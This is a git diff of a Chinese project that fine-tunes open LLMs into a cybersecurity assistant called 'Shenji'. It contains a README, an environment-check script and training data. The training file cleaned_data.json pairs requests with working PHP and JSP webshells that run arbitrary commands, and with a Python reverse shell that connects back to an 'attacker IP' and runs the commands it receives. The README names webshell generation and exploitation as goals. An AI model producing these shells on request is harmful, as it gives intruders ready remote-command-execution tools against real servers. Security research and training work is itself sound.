+                "output": "期望输出"
+            }
+        ]
+        return custom_data
+```
+
+3. **自定义提示模板**
+```python
+# 在 src/config/data_config.py 中修改模板
+class PromptTemplates:
+    SECURITY_ANALYSIS = "分析以下安全问题:{question}\n\n分析:{answer}"
+```
 
+### 模块化使用
 
+1. **单独使用数据处理模块**
+```python
+from src.data import DataDownloader, DataProcessor
 
-## Getting started
+downloader = DataDownloader()
+processor = DataProcessor()
 
-To make it easy for you to get started with GitLab, here's a list of recommended next steps.
+# 下载和处理数据
+data = downloader.download_all_data()
+processed_data = processor.process_data(data)
+```
+
+2. **单独使用模型训练模块**
+```python
+from src.model import SecurityModelTrainer
+from src.config import TrainingConfig, LoRAConfig
+
+trainer = SecurityModelTrainer()
+trainer.setup_model_and_tokenizer()
+trainer.train()
+```
 
-Already a pro? Just edit this README.md and make it your own. Want to make it easy? [Use the template at the bottom](#editing-this-readme)!
+3.### 单独使用推理模块**
+```python
+from src.model import SecurityModelInference
+from src.config.settings import Config
 
-## Add your files
+# 使用默认模型
+config = Config()
+inference = SecurityModelInference(config)
+inference.load_model()
 
-- [ ] [Create](https://docs.gitlab.com/ee/user/project/repository/web_editor.html#create-a-file) or [upload](https://docs.gitlab.com/ee/user/project/repository/web_editor.html#upload-a-file) files
-- [ ] [Add files using the command line](https://docs.gitlab.com/ee/gitlab-basics/add-file.html#add-a-file-using-the-command-line) or push an existing Git repository with the following command:
+# 使用指定模型
+inference = SecurityModelInference(config, model_key="qwen2.5-7b")
+inference.load_model(model_key="qwen2.5-7b")
 
+response = inference.generate_response("如何进行SQL注入测试?")
 ```
-cd existing_repo
-git remote add origin http://47.103.205.229:8099/dify4j/project0802shenji.git
-git branch -M main
-git push -uf origin main
+
+### 模型管理
+
+使用模型管理CLI工具来管理多个模型:
+
+```bash
+# 列出所有可用模型
+python scripts/model_manager.py list
+
+# 下载指定模型
+python scripts/model_manager.py download qwen2.5-1.5b
+python scripts/model_manager.py download chatglm3-6b
+
+# 切换当前模型
+python scripts/model_manager.py switch qwen2.5-7b
+
+# 显示当前模型信息
+python scripts/model_manager.py current
+
+# 测试模型推理
+python scripts/model_manager.py test qwen2.5-1.5b
+
+# 与模型进行交互式对话
+python scripts/model_manager.py chat qwen2.5-1.5b
+
+# 显示模型详细信息
+python scripts/model_manager.py info chatglm3-6b
+``` 训练管理
+
+```bash
+# 查看所有screen会话
+screen -list
+
+# 进入训练会话
+screen -r security_training
+
+# 在会话内分离(不终止训练)
+# 按 Ctrl+A, 然后按 D
+
+# 终止训练
+screen -S security_training -X quit
+
+# 查看GPU使用情况
+watch -n 1 nvidia-smi
 ```
 
-## Integrate with your tools
+## 📊 训练监控
 
-- [ ] [Set up project integrations](http://47.103.205.229:8099/dify4j/project0802shenji/-/settings/integrations)
+### 监控界面
 
-## Collaborate with your team
+运行 `python3 monitor.py` 可以看到:
+- 训练会话状态
+- 当前训练进度
+- GPU使用情况
+- 系统资源状态
+- 最新训练日志
 
-- [ ] [Invite team members and collaborators](https://docs.gitlab.com/ee/user/project/members/)
-- [ ] [Create a new merge request](https://docs.gitlab.com/ee/user/project/merge_requests/creating_merge_requests.html)
-- [ ] [Automatically close issues from merge requests](https://docs.gitlab.com/ee/user/project/issues/managing_issues.html#closing-issues-automatically)
-- [ ] [Enable merge request approvals](https://docs.gitlab.com/ee/user/project/merge_requests/approvals/)
-- [ ] [Set auto-merge](https://docs.gitlab.com/ee/user/project/merge_requests/merge_when_pipeline_succeeds.html)
+### 日志文件
 
-## Test and Deploy
+- `logs/training_YYYYMMDD_HHMMSS.log`: 训练日志
+- `training.log`: 主程序日志
+- `training_report.txt`: 训练完成报告
 
-Use the built-in continuous integration in GitLab.
+## 🤖 神机身份解决方案
 
-- [ ] [Get started with GitLab CI/CD](https://docs.gitlab.com/ee/ci/quick_start/index.html)
-- [ ] [Analyze your code for known vulnerabilities with Static Application Security Testing(SAST)](https://docs.gitlab.com/ee/user/application_security/sast/)
-- [ ] [Deploy to Kubernetes, Amazon EC2, or Amazon ECS using Auto Deploy](https://docs.gitlab.com/ee/topics/autodevops/requirements.html)
-- [ ] [Use pull-based deployments for improved Kubernetes management](https://docs.gitlab.com/ee/user/clusters/agent/)
-- [ ] [Set up protected environments](https://docs.gitlab.com/ee/ci/environments/protected_environments.html)
+### 身份认知特性
+神机具备完整的身份认知系统,确保模型始终以"神机"身份回答问题:
 
-***
+- **默认身份**: "你是神机,由云霖网络安全实验室训练的网络安全大模型"
+- **动态设置**: 支持在推理时动态调整身份,无需修改模型文件
+- **Chat Template**: 使用标准化的对话模板确保身份一致性
+- **多轮对话**: 在整个对话过程中保持身份认知
 
-# Editing this README
+### 技术实现
+```python
+# 使用默认神机身份
+from src.model.inference import SecurityModelInference
+inference = SecurityModelInference()
+response, history = inference.chat("你是谁?")
 
-When you're ready to make this README your own, just edit this file and use the handy template below (or feel free to structure it however you want - this is just a starting point!). Thank you to [makeareadme.com](https://www.makeareadme.com/) for this template.
+# 使用自定义身份
+custom_system = "你是一个专业的网络安全专家。"
+response, history = inference.chat("你是谁?", system_message=custom_system)
+```
+
+详细说明请参考:[身份解决方案指南](identity_solution_guide.md)
 
-## Suggestions for a good README
-Every project is different, so consider which of these sections apply to yours. The sections used in the template are suggestions for most open source projects. Also keep in mind that while a README can be too long and detailed, too long is better than too short. If you think your README is too long, consider utilizing another form of documentation rather than cutting out information.
+## 🧪 统一测试框架
 
-## Name
-Choose a self-explaining name for your project.
+### 测试功能
+项目集成了统一的测试框架,支持以下测试项目:
 
-## Description
-Let people know what your project can do specifically. Provide context and add a link to any reference visitors might be unfamiliar with. A list of Features or a Background subsection can also be added here. If there are alternatives to your project, this is a good place to list differentiating factors.
+- **identity**: 身份解决方案测试
+- **data_loader**: 数据加载器测试
+- **download**: 模型下载功能测试
+- **git_download**: Git下载功能测试
+- **inference**: 模型推理功能测试
+- **all**: 运行所有测试
 
-## Badges
-On some READMEs, you may see small images that convey metadata, such as whether or not all the tests are passing for the project. You can use Shields to add some to your README. Many services also have instructions for adding a badge.
+### 使用方法
+```bash
+# 查看所有可用测试
+python tests/test_runner.py --list
 
-## Visuals
-Depending on what you are making, it can be a good idea to include screenshots or even a video (you'll frequently see GIFs rather than actual videos). Tools like ttygif can help, but check out Asciinema for a more sophisticated method.
+# 运行单项测试
+python tests/test_runner.py --test identity
+
+# 运行所有测试
+python tests/test_runner.py --test all
+```
 
-## Installation
-Within a particular ecosystem, there may be a common way of installing things, such as using Yarn, NuGet, or Homebrew. However, consider the possibility that whoever is reading your README is a novice and would like more guidance. Listing specific steps helps remove ambiguity and gets people to using your project as quickly as possible. If it only runs in a specific context like a particular programming language version or operating system or has dependencies that have to be installed manually, also add a Requirements subsection.
+详细说明请参考:[测试框架说明](tests/README.md)
+
+## 🎯 模型能力
+
+神机支持多种大语言模型,每个模型都具备以下核心能力:
+
+### 网络安全专业能力
+- WebShell代码生成和分析
+- 渗透测试脚本编写
+- 漏洞分析和利用技术
+- 安全工具开发
+- 网络攻防技术指导
+- CVE漏洞分析
+- 安全加固建议
+
+### 编程开发能力
+- Python/PHP/Java等多语言编程
+- 网络编程和系统编程
+- 安全工具和脚本开发
+- 代码审计和漏洞挖掘
+- 自动化工具开发
+
+### 中文理解能力
+- 中文技术文档理解
+- 中文安全知识问答
+- 中文代码注释生成
+- 中文安全术语解释
+
+### 身份认知能力
+- 明确的"神机"身份认知
+- 云霖网络安全实验室背景
+- 专业的网络安全知识体系
+- 一致的身份表达
+
+## 🤖 支持的模型
+
+神机支持多种主流大语言模型,用户可以根据需求选择合适的模型:
+
+### Qwen系列
+- **Qwen2.5-1.5B-Instruct**: 轻量级模型,适合资源受限环境
+- **Qwen2.5-7B-Instruct**: 平衡性能和资源消耗的中等规模模型
+- **Qwen2.5-14B-Instruct**: 高性能模型,适合专业应用
+- **Qwen2.5-32B-Instruct**: 大规模模型,提供最佳性能
+- **Qwen2.5-72B-Instruct**: 超大规模模型,适合高端应用
+
+### ChatGLM系列
+- **ChatGLM3-6B**: 支持多轮对话的中文优化模型
+
+### Baichuan系列
+- **Baichuan2-7B-Chat**: 中文能力强的对话模型
+- **Baichuan2-13B-Chat**: 更大规模的中文对话模型
+
+### Llama系列
+- **Llama2-7B-Chat**: Meta开源的对话模型
+- **Llama2-13B-Chat**: 更大规模的Llama对话模型
+
+每个模型都经过专门的适配和优化,确保在网络安全领域的专业表现。
+
+## ⚠️ 注意事项
+
+### 训练时间
+- 预计训练时间:6-12小时
+- 具体时间取决于数据量和硬件性能
+- 建议在夜间或空闲时间进行训练
+
+### 显存优化
+- 如果显存不足,可以减小 `batch_size` 或 `max_length`
+- 增加 `gradient_accumulation_steps` 来保持有效批次大小
+- 确保启用 `fp16` 混合精度训练
+
+### 数据安全
+- 训练数据包含网络安全相关内容
+- 生成的模型可能输出敏感代码
+- 请确保在安全环境中使用
+- 遵守相关法律法规
+
+### 模型使用
+- 神机模型专为教育和研究目的设计
+- 请负责任地使用生成的安全工具代码
+- 不要用于非法攻击活动
+- 模型具备明确的身份认知,请尊重其专业性
+
+## 🔍 故障排除
+
+### 常见错误
+
+1. **CUDA out of memory**
+```bash
+# 解决方案:降低批次大小
+# 编辑 src/config/training_config.py
+class TrainingConfig:
+    batch_size = 1
+    gradient_accumulation_steps = 16
+```
+
+2. **模型下载失败**
+```bash
+# 解决方案:切换数据源
+# 编辑 src/config/settings.py
+class Config:
+    USE_MODELSCOPE = False  # 切换到HuggingFace
+```
+
+3. **模块导入错误**
+```bash
+# 解决方案:设置Python路径
+export PYTHONPATH="$PWD/src:$PYTHONPATH"
+
+# 或使用启动脚本(自动设置)
+./start_training.sh
+```
+
+4. **权限错误**
+```bash
+# 解决方案:修改权限
+chmod +x start_training.sh
+sudo chown -R $USER:$USER ./
+```
+
+### 日志分析
+
+查看详细错误信息:
+```bash
+# 查看最新日志
+tail -f logs/training_$(ls logs/ | grep training | tail -1)
+
+# 搜索错误
+grep -i error logs/training_*.log
+
+# 查看GPU使用情况
+watch -n 1 nvidia-smi
+
+# 查看训练状态
+python -c "from src.utils.monitor import TrainingMonitor; m=TrainingMonitor(); print(m.get_current_status())"
+```
+
+### 开发调试
+
+```bash
+# 使用统一测试框架进行调试
+python tests/test_runner.py --test all
+
+# 测试特定功能
+python tests/test_runner.py --test identity      # 测试身份解决方案
+python tests/test_runner.py --test data_loader   # 测试数据加载
+python tests/test_runner.py --test inference     # 测试推理功能
+
+# 测试单个模块
+python -c "from src.config import Config; print(Config.PROJECT_ROOT)"
+python -c "from src.data import DataDownloader; d=DataDownloader(); print('DataDownloader OK')"
+python -c "from src.model import SecurityModelTrainer; print('Trainer OK')"
+
+# 环境检查
+python main.py --mode check
+```
+
+### 代码结构说明
+- **src/config/**: 配置管理,包含所有配置类
+- **src/data/**: 数据处理,包含下载、处理、加载功能
+- **src/model/**: 模型管理,包含下载、训练、推理功能
+- **src/utils/**: 工具模块,包含日志、监控、环境检查
+- **src/app.py**: 主应用程序,整合所有功能
+
+### 性能优化
+
+1. **提高训练速度**
+   - 使用SSD存储
+   - 增加系统内存
+   - 优化数据加载
+
+2. **减少显存使用**
+   - 启用梯度检查点
+   - 使用更小的模型
+   - 减少序列长度
+
+## 📞 技术支持
+
+如果遇到问题,请按以下步骤排查:
+
+### 基础检查
+1. 系统要求是否满足
+2. 依赖是否正确安装
+3. 日志文件中的错误信息
+4. GPU驱动和CUDA版本
+
+### 使用测试框架诊断
+```bash
+# 运行完整测试诊断
+python tests/test_runner.py --test all
+
+# 针对性测试
+python tests/test_runner.py --test identity      # 身份问题
+python tests/test_runner.py --test download      # 下载问题
+python tests/test_runner.py --test inference     # 推理问题
+```
 
-## Usage
-Use examples liberally, and show the expected output if you can. It's helpful to have inline the smallest example of usage that you can demonstrate, while providing links to more sophisticated examples if they are too long to reasonably include in the README.
+### 常见问题
+- **身份认知问题**: 参考 [身份解决方案指南](identity_solution_guide.md)
+- **测试相关问题**: 参考 [测试框架说明](tests/README.md)
+- **模型推理问题**: 检查Chat Template配置
+- **训练问题**: 查看训练日志和监控信息
 
-## Support
-Tell people where they can go to for help. It can be any combination of an issue tracker, a chat room, an email address, etc.
+## 📄 许可证
 
-## Roadmap
-If you have ideas for releases in the future, it is a good idea to list them in the README.
+本项目由云霖网络安全实验室开发,仅供学习和研究使用,请遵守相关法律法规。相关软件著作权已经申请
 
-## Contributing
-State if you are open to contributions and what your requirements are for accepting them.
+## 🔗 相关文档
 
-For people who want to make changes to your project, it's helpful to have some documentation on how to get started. Perhaps there is a script that they should run or some environment variables that they need to set. Make these steps explicit. These instructions could also be useful to your future self.
+- [身份解决方案指南](identity_solution_guide.md) - 详细的神机身份设置说明
+- [测试框架说明](tests/README.md) - 统一测试框架使用指南
+- [项目更新日志](CHANGELOG.md) - 版本更新记录(如有)
 
-You can also document commands to lint the code or run tests. These steps help to ensure high code quality and reduce the likelihood that the changes inadvertently break something. Having instructions for running tests is especially helpful if it requires external setup, such as starting a Selenium server for testing in a browser.
+## 🏷️ 版本信息
 
-## Authors and acknowledgment
-Show your appreciation to those who have contributed to the project.
+- **当前版本**: v2.0.0
+- **当前模型版本**: 基于Qwen2.5-1.5B
+- **身份系统**: 神机身份认知v1.0
+- **测试框架**: 统一测试系统v1.0
 
-## License
-For open source projects, say how it is licensed.
+---
 
-## Project status
-If you have run out of energy or time for your project, put a note at the top of the README saying that development has slowed down or stopped completely. Someone may choose to fork your project or volunteer to step in as a maintainer or owner, allowing your project to keep going. You can also make an explicit request for maintainers.
+**开始你的网络安全模型训练之旅!** 🚀🤖

BIN
__pycache__/download_model.cpython-310.pyc


+ 176 - 0
check_environment.py

@@ -0,0 +1,176 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+"""
+环境检查脚本
+自动检查系统要求和依赖安装情况
+"""
+
+import sys
+import subprocess
+import importlib
+from pathlib import Path
+
+
+def check_python_version():
+    """检查Python版本"""
+    print("🔍 检查Python版本...")
+    version = sys.version_info
+    if version.major == 3 and version.minor >= 8:
+        print(f"✅ Python版本: {version.major}.{version.minor}.{version.micro} (符合要求)")
+        return True
+    else:
+        print(f"❌ Python版本: {version.major}.{version.minor}.{version.micro} (需要Python 3.8+)")
+        return False
+
+
+def check_memory():
+    """检查系统内存"""
+    print("\n🔍 检查系统内存...")
+    try:
+        import psutil
+        memory = psutil.virtual_memory()
+        memory_gb = memory.total / (1024**3)
+        if memory_gb >= 8:
+            print(f"✅ 系统内存: {memory_gb:.1f}GB (符合要求)")
+            return True
+        else:
+            print(f"⚠️ 系统内存: {memory_gb:.1f}GB (推荐8GB+)")
+            return True  # 不强制要求
+    except ImportError:
+        print("⚠️ 无法检查内存 (psutil未安装)")
+        return True
+
+
+def check_gpu():
+    """检查GPU"""
+    print("\n🔍 检查GPU...")
+    try:
+        import torch
+        if torch.cuda.is_available():
+            gpu_count = torch.cuda.device_count()
+            gpu_name = torch.cuda.get_device_name(0)
+            print(f"✅ 检测到GPU: {gpu_name} (数量: {gpu_count})")
+            return True
+        else:
+            print("⚠️ 未检测到可用GPU (可以使用CPU训练,但速度较慢)")
+            return True
+    except ImportError:
+        print("⚠️ 无法检查GPU (PyTorch未安装)")
+        return True
+
+
+def check_dependencies():
+    """检查核心依赖"""
+    print("\n🔍 检查核心依赖...")
+    
+    required_packages = {
+        'torch': 'PyTorch',
+        'transformers': 'Transformers',
+        'datasets': 'Datasets',
+        'peft': 'PEFT',
+        'accelerate': 'Accelerate',
+        'huggingface_hub': 'Hugging Face Hub',
+        'safetensors': 'SafeTensors',
+        'sentencepiece': 'SentencePiece',
+        'tqdm': 'TQDM',
+        'requests': 'Requests',
+        'numpy': 'NumPy',
+        'pandas': 'Pandas',
+        'psutil': 'PSUtil'
+    }
+    
+    missing_packages = []
+    
+    for package, name in required_packages.items():
+        try:
+            module = importlib.import_module(package)
+            version = getattr(module, '__version__', 'unknown')
+            print(f"✅ {name}: {version}")
+        except ImportError:
+            print(f"❌ {name}: 未安装")
+            missing_packages.append(package)
+    
+    return len(missing_packages) == 0, missing_packages
+
+
+def check_project_structure():
+    """检查项目结构"""
+    print("\n🔍 检查项目结构...")
+    
+    required_files = [
+        'requirements.txt',
+        'main.py',
+        'start_training.sh',
+        'src/app.py',
+        'src/config/settings.py',
+        'src/model/trainer.py',
+        'src/data/loader.py'
+    ]
+    
+    missing_files = []
+    
+    for file_path in required_files:
+        if Path(file_path).exists():
+            print(f"✅ {file_path}")
+        else:
+            print(f"❌ {file_path}: 文件不存在")
+            missing_files.append(file_path)
+    
+    return len(missing_files) == 0, missing_files
+
+
+def provide_solutions(missing_packages, missing_files):
+    """提供解决方案"""
+    if missing_packages or missing_files:
+        print("\n🔧 解决方案:")
+        
+        if missing_packages:
+            print("\n📦 安装缺失的依赖:")
+            print("pip install -r requirements.txt")
+            print("\n或者逐个安装:")
+            for package in missing_packages:
+                print(f"pip install {package}")
+        
+        if missing_files:
+            print("\n📁 缺失的文件:")
+            for file_path in missing_files:
+                print(f"- {file_path}")
+            print("请确保您在正确的项目目录中运行此脚本")
+
+
+def main():
+    """主函数"""
+    print("🚀 Qwen安全模型训练项目 - 环境检查")
+    print("=" * 50)
+    
+    checks = [
+        check_python_version(),
+        check_memory(),
+        check_gpu()
+    ]
+    
+    deps_ok, missing_packages = check_dependencies()
+    checks.append(deps_ok)
+    
+    structure_ok, missing_files = check_project_structure()
+    checks.append(structure_ok)
+    
+    print("\n" + "=" * 50)
+    
+    if all(checks):
+        print("🎉 环境检查通过!您可以开始使用项目了。")
+        print("\n📚 下一步:")
+        print("1. 运行: python main.py --help")
+        print("2. 或者: ./start_training.sh --help")
+        print("3. 查看: README.md 了解详细使用方法")
+    else:
+        print("⚠️ 环境检查发现问题,请按照以下建议解决:")
+        provide_solutions(missing_packages, missing_files)
+        print("\n解决问题后,请重新运行此脚本进行检查。")
+    
+    return all(checks)
+
+
+if __name__ == "__main__":
+    success = main()
+    sys.exit(0 if success else 1)

+ 14 - 0
data/processed/additional_data.json

@@ -0,0 +1,14 @@
+[
+  {
+    "instruction": "解释什么是XSS攻击",
+    "input": "",
+    "output": "XSS(跨站脚本攻击)是一种常见的Web安全漏洞,攻击者通过在网页中注入恶意脚本代码,当其他用户浏览该网页时,恶意脚本会在用户浏览器中执行。\n\nXSS攻击类型:\n1. 反射型XSS:恶意脚本通过URL参数传递\n2. 存储型XSS:恶意脚本存储在服务器数据库中\n3. DOM型XSS:通过修改DOM结构执行恶意脚本\n\n防护措施:\n- 输入验证和输出编码\n- 使用CSP(内容安全策略)\n- HttpOnly Cookie\n- 定期安全扫描",
+    "category": "security"
+  },
+  {
+    "instruction": "编写一个简单的网络连接检测脚本",
+    "input": "",
+    "output": "以下是一个Python网络连接检测脚本:\n\n```python\nimport socket\nimport subprocess\nimport platform\n\ndef ping_host(host):\n    \"\"\"使用ping命令检测主机连通性\"\"\"\n    param = '-n' if platform.system().lower() == 'windows' else '-c'\n    command = ['ping', param, '1', host]\n    \n    try:\n        result = subprocess.run(command, capture_output=True, text=True, timeout=5)\n        return result.returncode == 0\n    except subprocess.TimeoutExpired:\n        return False\n\ndef check_tcp_connection(host, port, timeout=3):\n    \"\"\"检测TCP端口连接\"\"\"\n    try:\n        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        sock.settimeout(timeout)\n        result = sock.connect_ex((host, port))\n        sock.close()\n        return result == 0\n    except:\n        return False\n\ndef network_check(targets):\n    \"\"\"批量网络检测\"\"\"\n    results = {}\n    \n    for target in targets:\n        host = target['host']\n        port = target.get('port')\n        \n        print(f\"检测 {host}...\")\n        \n        # Ping检测\n        ping_result = ping_host(host)\n        results[host] = {'ping': ping_result}\n        \n        # 端口检测\n        if port:\n            tcp_result = check_tcp_connection(host, port)\n            results[host]['tcp'] = tcp_result\n            print(f\"  Ping: {'✓' if ping_result else '✗'}  TCP:{port} {'✓' if tcp_result else '✗'}\")\n        else:\n            print(f\"  Ping: {'✓' if ping_result else '✗'}\")\n    \n    return results\n\n# 使用示例\nif __name__ == \"__main__\":\n    test_targets = [\n        {'host': '8.8.8.8'},\n        {'host': 'google.com', 'port': 80},\n        {'host': 'github.com', 'port': 443}\n    ]\n    \n    results = network_check(test_targets)\n    print(\"\\n检测完成!\")\n```\n\n这个脚本可以检测主机的ping连通性和TCP端口连接状态。",
+    "category": "programming"
+  }
+]

+ 74 - 0
data/processed/cleaned_data.json

@@ -0,0 +1,74 @@
+[
+  {
+    "instruction": "生成一个PHP webshell",
+    "input": "",
+    "output": "<?php\nif(isset($_POST['cmd'])){\n    $cmd = $_POST['cmd'];\n    echo \"<pre>\";\n    echo shell_exec($cmd);\n    echo \"</pre>\";\n}\n?>\n<form method=\"POST\">\n    <input type=\"text\" name=\"cmd\" placeholder=\"输入命令\">\n    <input type=\"submit\" value=\"执行\">\n</form>",
+    "category": "webshell"
+  },
+  {
+    "instruction": "创建一个简单的JSP webshell",
+    "input": "",
+    "output": "<%@ page import=\"java.io.*\" %>\n<%\nString cmd = request.getParameter(\"cmd\");\nif(cmd != null) {\n    Process p = Runtime.getRuntime().exec(cmd);\n    BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));\n    String line;\n    while((line = br.readLine()) != null) {\n        out.println(line + \"<br>\");\n    }\n}\n%>\n<form>\n    <input type=\"text\" name=\"cmd\">\n    <input type=\"submit\" value=\"执行\">\n</form>",
+    "category": "webshell"
+  },
+  {
+    "instruction": "解释SQL注入攻击的原理和防护方法",
+    "input": "",
+    "output": "SQL注入是一种代码注入技术,攻击者通过在应用程序的输入字段中插入恶意SQL代码来操纵数据库查询。防护方法包括:1.使用参数化查询 2.输入验证和过滤 3.最小权限原则 4.WAF防护等。",
+    "category": "security"
+  },
+  {
+    "instruction": "编写一个端口扫描脚本",
+    "input": "",
+    "output": "import socket\nfrom threading import Thread\n\ndef scan_port(host, port):\n    try:\n        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        sock.settimeout(1)\n        result = sock.connect_ex((host, port))\n        if result == 0:\n            print(f\"端口 {port} 开放\")\n        sock.close()\n    except:\n        pass\n\nhost = \"127.0.0.1\"\nfor port in range(1, 1000):\n    Thread(target=scan_port, args=(host, port)).start()",
+    "category": "code"
+  },
+  {
+    "instruction": "生成一个反弹shell的Python脚本",
+    "input": "",
+    "output": "import socket\nimport subprocess\nimport os\n\ndef reverse_shell(host, port):\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.connect((host, port))\n    \n    while True:\n        command = s.recv(1024).decode()\n        if command.lower() == 'exit':\n            break\n        \n        output = subprocess.getoutput(command)\n        s.send(output.encode())\n    \n    s.close()\n\n# 使用方法: reverse_shell(\"攻击者IP\", 端口)",
+    "category": "security"
+  },
+  {
+    "instruction": "解释XSS攻击原理和防护方法",
+    "input": "",
+    "output": "XSS(跨站脚本攻击)是一种代码注入攻击,攻击者将恶意脚本注入到网页中。防护方法包括:1.输出编码 2.输入验证 3.CSP策略 4.HttpOnly Cookie等。",
+    "category": "security"
+  },
+  {
+    "instruction": "编写一个简单的网络扫描器",
+    "input": "",
+    "output": "import socket\nimport threading\nfrom datetime import datetime\n\nclass NetworkScanner:\n    def __init__(self, target_host):\n        self.target = target_host\n        self.open_ports = []\n    \n    def scan_port(self, port):\n        try:\n            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n            sock.settimeout(1)\n            result = sock.connect_ex((self.target, port))\n            if result == 0:\n                self.open_ports.append(port)\n                print(f\"端口 {port}: 开放\")\n            sock.close()\n        except:\n            pass\n    \n    def scan_range(self, start_port, end_port):\n        print(f\"开始扫描 {self.target}...\")\n        threads = []\n        \n        for port in range(start_port, end_port + 1):\n            thread = threading.Thread(target=self.scan_port, args=(port,))\n            threads.append(thread)\n            thread.start()\n        \n        for thread in threads:\n            thread.join()\n        \n        print(f\"扫描完成,发现 {len(self.open_ports)} 个开放端口\")\n        return self.open_ports\n\n# 使用示例\nscanner = NetworkScanner(\"127.0.0.1\")\nopen_ports = scanner.scan_range(1, 1000)",
+    "category": "code"
+  },
+  {
+    "instruction": "编写一个Python函数来检测文件是否为恶意软件",
+    "input": "",
+    "output": "import hashlib\nimport requests\nimport os\n\ndef check_malware(file_path):\n    \"\"\"检测文件是否为恶意软件\"\"\"\n    if not os.path.exists(file_path):\n        return {\"error\": \"文件不存在\"}\n    \n    # 计算文件MD5\n    with open(file_path, 'rb') as f:\n        file_hash = hashlib.md5(f.read()).hexdigest()\n    \n    # 检查文件大小\n    file_size = os.path.getsize(file_path)\n    \n    # 简单的启发式检测\n    suspicious_patterns = [b'eval', b'exec', b'system', b'shell_exec']\n    is_suspicious = False\n    \n    try:\n        with open(file_path, 'rb') as f:\n            content = f.read()\n            for pattern in suspicious_patterns:\n                if pattern in content:\n                    is_suspicious = True\n                    break\n    except:\n        pass\n    \n    return {\n        \"file_path\": file_path,\n        \"md5_hash\": file_hash,\n        \"file_size\": file_size,\n        \"is_suspicious\": is_suspicious,\n        \"risk_level\": \"high\" if is_suspicious else \"low\"\n    }\n\n# 使用示例\nresult = check_malware(\"example.php\")\nprint(result)",
+    "category": "code"
+  },
+  {
+    "instruction": "创建一个简单的网络数据包捕获程序",
+    "input": "",
+    "output": "from scapy.all import *\nimport time\n\nclass PacketCapture:\n    def __init__(self, interface=\"eth0\"):\n        self.interface = interface\n        self.captured_packets = []\n    \n    def packet_handler(self, packet):\n        \"\"\"数据包处理函数\"\"\"\n        timestamp = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n        \n        if packet.haslayer(IP):\n            ip_src = packet[IP].src\n            ip_dst = packet[IP].dst\n            protocol = packet[IP].proto\n            \n            packet_info = {\n                \"timestamp\": timestamp,\n                \"src_ip\": ip_src,\n                \"dst_ip\": ip_dst,\n                \"protocol\": protocol\n            }\n            \n            if packet.haslayer(TCP):\n                packet_info[\"src_port\"] = packet[TCP].sport\n                packet_info[\"dst_port\"] = packet[TCP].dport\n                packet_info[\"protocol_name\"] = \"TCP\"\n            elif packet.haslayer(UDP):\n                packet_info[\"src_port\"] = packet[UDP].sport\n                packet_info[\"dst_port\"] = packet[UDP].dport\n                packet_info[\"protocol_name\"] = \"UDP\"\n            \n            self.captured_packets.append(packet_info)\n            print(f\"[{timestamp}] {ip_src} -> {ip_dst} ({packet_info.get('protocol_name', 'Unknown')})\")\n    \n    def start_capture(self, count=10):\n        \"\"\"开始捕获数据包\"\"\"\n        print(f\"开始在 {self.interface} 上捕获数据包...\")\n        sniff(iface=self.interface, prn=self.packet_handler, count=count)\n        return self.captured_packets\n\n# 使用示例\ncapture = PacketCapture()\npackets = capture.start_capture(count=20)",
+    "category": "code"
+  },
+  {
+    "instruction": "什么是CSRF攻击?如何防护?",
+    "input": "",
+    "output": "CSRF(跨站请求伪造)利用用户已登录的身份,诱导用户执行非本意的操作。防护措施包括:1.CSRF Token验证 2.验证HTTP Referer头 3.双重Cookie验证 4.设置SameSite Cookie属性 5.重要操作需要二次确认。",
+    "category": "chinese_security"
+  },
+  {
+    "instruction": "解释缓冲区溢出攻击的原理",
+    "input": "",
+    "output": "缓冲区溢出是指程序向缓冲区写入数据时超出了缓冲区的边界,覆盖了相邻的内存区域。攻击者可以利用这个漏洞执行恶意代码。防护方法包括:1.使用安全的函数 2.栈保护机制 3.地址空间随机化(ASLR) 4.数据执行保护(DEP) 5.代码审计和静态分析。",
+    "category": "chinese_security"
+  },
+  {
+    "instruction": "如何进行Web应用安全测试?",
+    "input": "",
+    "output": "Web应用安全测试的主要步骤:1.信息收集(端口扫描、目录枚举、技术栈识别)2.漏洞扫描(SQL注入、XSS、CSRF等)3.身份验证测试(弱密码、会话管理)4.授权测试(权限绕过、越权访问)5.输入验证测试(文件上传、参数污染)6.业务逻辑测试(支付绕过、逻辑缺陷)7.配置安全测试(默认配置、敏感信息泄露)。",
+    "category": "chinese_security"
+  }
+]

La diferencia del archivo ha sido suprimido porque es demasiado grande
+ 0 - 0
data/processed/dedup_alpaca_with_cot.jsonl


La diferencia del archivo ha sido suprimido porque es demasiado grande
+ 0 - 0
data/processed/dedup_cve_dataset_sample.jsonl


La diferencia del archivo ha sido suprimido porque es demasiado grande
+ 0 - 0
data/processed/dedup_cve_security_training.jsonl


La diferencia del archivo ha sido suprimido porque es demasiado grande
+ 0 - 0
data/processed/dedup_eval_data.jsonl


La diferencia del archivo ha sido suprimido porque es demasiado grande
+ 0 - 0
data/processed/dedup_hf_dataset_sample.jsonl


La diferencia del archivo ha sido suprimido porque es demasiado grande
+ 0 - 0
data/processed/dedup_modelscope_dataset_sample.jsonl


La diferencia del archivo ha sido suprimido porque es demasiado grande
+ 23 - 0
data/processed/dedup_modelscope_security_training.jsonl


La diferencia del archivo ha sido suprimido porque es demasiado grande
+ 0 - 0
data/processed/dedup_poc_security_training.jsonl


La diferencia del archivo ha sido suprimido porque es demasiado grande
+ 0 - 0
data/processed/dedup_train_data.jsonl


+ 26 - 0
data/processed/enhanced_test.json

@@ -0,0 +1,26 @@
+[
+  {
+    "text": "<|im_start|>user\n如何检测SQL注入攻击?<|im_end|>\n<|im_start|>assistant\nSQL注入攻击检测可以通过以下方法:\n1. 输入验证和参数化查询\n2. 使用Web应用防火墙(WAF)\n3. 定期进行安全审计<|im_end|>"
+  },
+  {
+    "instruction": "解释XSS攻击的原理",
+    "input": "什么是跨站脚本攻击?",
+    "output": "XSS(Cross-Site Scripting)是一种代码注入攻击,攻击者通过在网页中注入恶意脚本代码,当其他用户浏览该网页时,恶意代码会在用户浏览器中执行。",
+    "category": "网络安全"
+  },
+  {
